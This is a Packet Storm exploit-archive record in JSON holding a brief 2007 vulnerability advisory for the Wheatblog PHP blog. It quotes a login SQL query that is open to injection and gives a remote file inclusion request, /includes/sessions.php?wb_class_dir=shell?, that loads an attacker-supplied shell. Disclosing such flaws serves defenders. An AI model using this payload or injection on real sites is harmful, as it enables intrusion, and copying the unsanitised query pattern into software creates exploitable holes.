{"id": "PACKETSTORM:57382", "type": "packetstorm", "bulletinFamily": "exploit", "title": "wheatblog-rfi.txt", "description": "", "published": "2007-07-01T00:00:00", "modified": "2007-07-01T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/57382/wheatblog-rfi.txt.html", "reporter": "Eugene Minaev", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:19:26", "viewCount": 10, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "sourceHref": "https://packetstormsecurity.com/files/download/57382/wheatblog-rfi.txt", "sourceData": "`Found by E.Minaev (underwater@itdefence.ru) \nITDefence.ru \n \n1) SQL Injection in login function. With help of this injection is possible to make per-symbol brute of tables names of blog's database (magic_quotes_gpc should be tured off). \n \n------------------------------------------ \n\"$sql = \"select * from $tblUsers where login = '$login'\"; \nif ( $login != $row['login'] ) $valid_user = 0; \nif ( $password != $row['password'] ) $valid_user = 0;\" \n------------------------------------------ \n \n2) Remote File Inclusion (RFI) \n/includes/sessions.php?wb_class_dir=shell? \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647126540, "score": 1659769055}}
{}